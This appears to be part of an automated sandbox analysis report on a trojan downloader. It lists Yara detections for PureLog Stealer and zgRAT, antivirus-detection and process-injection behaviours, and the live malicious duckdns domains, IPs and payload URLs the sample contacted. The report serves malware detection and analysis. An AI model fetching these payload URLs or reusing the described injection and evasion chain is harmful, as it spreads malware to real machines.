Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Keywords.exe, 00000007.00000002.1568333223.0000000001469000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected PureLog Stealer
Source: Yara match File source: 17.2.Keywords.exe.3e70520.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.416cb90.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.AlgorithmType.exe.205312b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.fdyryi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.416cb90.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AlgorithmType.exe.1b81698e628.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Keywords.exe.3eb6f60.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.41ecbb0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.MSBuild.exe.3d0db40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.42ecbd0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Keywords.exe.3eb6f60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5520000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.4644078.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Keywords.exe.3e70520.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.AlgorithmType.exe.205312b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.aspnet_compiler.exe.154f60ce598.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AlgorithmType.exe.1b816c730b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.7050000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.fdyryi.exe.29a74360000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.42ecbd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AlgorithmType.exe.1b816b33078.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AlgorithmType.exe.1b816c730b0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.aspnet_compiler.exe.154f60ce598.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AlgorithmType.exe.1b81698e628.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5520000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.4784098.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.MSBuild.exe.3d0db40.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.fdyryi.exe.29a105de528.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.41ecbb0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.4784098.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.fdyryi.exe.29a105de528.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.fdyryi.exe.29a74360000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AlgorithmType.exe.1b816b33078.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.7050000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.4644078.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.459a420.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.1758256473.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1915461122.00000205312B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2144258743.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2317223461.00000154F6028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1558833158.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1462651958.0000000007050000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1465856170.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1447665099.000000000459A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1480296613.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2526240071.00000205418DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1835703114.0000029A10538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2526240071.00000205417C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1447665099.0000000003E97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1490428005.0000000005520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2417439264.0000029A74360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1685032824.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2143085214.000001B8168E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected zgRAT
Source: Yara match File source: 22.2.AlgorithmType.exe.205312b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.AlgorithmType.exe.205312b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AlgorithmType.exe.1b81698e628.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.1915461122.00000205312B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected PureLog Stealer
Source: Yara match File source: 17.2.Keywords.exe.3e70520.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.416cb90.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.AlgorithmType.exe.205312b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.fdyryi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.416cb90.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AlgorithmType.exe.1b81698e628.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Keywords.exe.3eb6f60.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.41ecbb0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.MSBuild.exe.3d0db40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.42ecbd0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Keywords.exe.3eb6f60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5520000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.4644078.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Keywords.exe.3e70520.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.AlgorithmType.exe.205312b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.aspnet_compiler.exe.154f60ce598.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AlgorithmType.exe.1b816c730b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.7050000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.fdyryi.exe.29a74360000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.42ecbd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AlgorithmType.exe.1b816b33078.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AlgorithmType.exe.1b816c730b0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.aspnet_compiler.exe.154f60ce598.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AlgorithmType.exe.1b81698e628.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.5520000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.4784098.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.MSBuild.exe.3d0db40.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.fdyryi.exe.29a105de528.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.41ecbb0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.4784098.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.fdyryi.exe.29a105de528.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.fdyryi.exe.29a74360000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AlgorithmType.exe.1b816b33078.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.7050000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.4644078.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.459a420.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.1758256473.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1915461122.00000205312B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2144258743.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2317223461.00000154F6028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1558833158.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1462651958.0000000007050000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1465856170.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1447665099.000000000459A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1480296613.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2526240071.00000205418DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1835703114.0000029A10538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2526240071.00000205417C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1447665099.0000000003E97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1490428005.0000000005520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2417439264.0000029A74360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1685032824.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2143085214.000001B8168E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected zgRAT
Source: Yara match File source: 22.2.AlgorithmType.exe.205312b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.AlgorithmType.exe.205312b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AlgorithmType.exe.1b81698e628.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.1915461122.00000205312B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428544 Sample: SecuriteInfo.com.Trojan.Dow... Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 67 miliutyhgdue.duckdns.org 2->67 69 juytlioojbni.duckdns.org 2->69 71 2 other IPs or domains 2->71 91 Sigma detected: Xmrig 2->91 93 Multi AV Scanner detection for domain / URL 2->93 95 Malicious sample detected (through community Yara rule) 2->95 99 21 other signatures 2->99 11 AlgorithmType.exe 2->11         started        14 Keywords.exe 14 3 2->14         started        16 fdyryi.exe 2->16         started        18 5 other processes 2->18 signatures3 97 Uses dynamic DNS services 69->97 process4 dnsIp5 113 Antivirus detection for dropped file 11->113 115 Multi AV Scanner detection for dropped file 11->115 117 Machine Learning detection for dropped file 11->117 21 AlgorithmType.exe 11->21         started        119 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 14->119 121 Injects a PE file into a foreign processes 14->121 24 Keywords.exe 14->24         started        123 Modifies the context of a thread in another process (thread injection) 16->123 26 fdyryi.exe 16->26         started        73 juytlioojbni.duckdns.org 91.92.246.15, 49701, 49702, 49703 THEZONEBG Bulgaria 18->73 125 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->125 127 Loading BitLocker PowerShell Module 18->127 29 SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe 6 18->29         started        31 conhost.exe 18->31         started        33 conhost.exe 18->33         started        35 2 other processes 18->35 signatures6 process7 file8 101 Writes to foreign memory regions 21->101 103 Modifies the context of a thread in another process (thread injection) 21->103 105 Injects a PE file into a foreign processes 21->105 37 aspnet_compiler.exe 21->37         started        40 MSBuild.exe 24->40         started        59 C:\Users\user\AppData\...\AlgorithmType.exe, PE32+ 26->59 dropped 61 C:\Users\user\AppData\Local\...\Keywords.exe, PE32 29->61 dropped signatures9 process10 signatures11 107 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 37->107 109 Modifies the context of a thread in another process (thread injection) 37->109 111 Injects a PE file into a foreign processes 37->111 42 aspnet_compiler.exe 37->42         started        47 MSBuild.exe 40->47         started        process12 dnsIp13 77 bnfjdbhgo.duckdns.org 91.92.254.152 THEZONEBG Bulgaria 42->77 63 C:\Users\user\AppData\Local\...\pjmskbbdr.exe, PE32 42->63 dropped 129 Writes to foreign memory regions 42->129 131 Modifies the context of a thread in another process (thread injection) 42->131 133 Injects a PE file into a foreign processes 42->133 49 pjmskbbdr.exe 42->49         started        52 AddInProcess.exe 42->52         started        55 AddInProcess.exe 42->55         started        79 miliutyhgdue.duckdns.org 91.92.253.47, 49709, 49711, 49712 THEZONEBG Bulgaria 47->79 65 C:\Users\user\AppData\Local\Temp\fdyryi.exe, PE32+ 47->65 dropped file14 signatures15 process16 dnsIp17 81 Antivirus detection for dropped file 49->81 83 Multi AV Scanner detection for dropped file 49->83 85 Writes to foreign memory regions 49->85 87 Injects a PE file into a foreign processes 49->87 57 RegAsm.exe 49->57         started        75 91.92.246.62 THEZONEBG Bulgaria 52->75 89 Query firmware table information (likely to detect VMs) 52->89 signatures18 process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.92.253.47
 miliutyhgdue.duckdns.org Bulgaria
34368 THEZONEBG true
91.92.246.62
 unknown Bulgaria
34368 THEZONEBG true
91.92.246.15
 juytlioojbni.duckdns.org Bulgaria
34368 THEZONEBG true
91.92.254.152
 bnfjdbhgo.duckdns.org Bulgaria
34368 THEZONEBG true

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.214.172 true
bnfjdbhgo.duckdns.org 91.92.254.152 true
juytlioojbni.duckdns.org 91.92.246.15 true
miliutyhgdue.duckdns.org 91.92.253.47 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/plugin3.dll true unknown
http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/Gkwyrkfwp.pdf true unknown
http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/mirtn.exe true unknown
http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/Wsrszrqqkm.vdf true unknown
http://bnfjdbhgo.duckdns.org/byfronbypass.html/css/mss/Uuanez.pdf false unknown
http://bnfjdbhgo.duckdns.org/byfronbypass.html/css/mss/utr32.exe false
    		unknown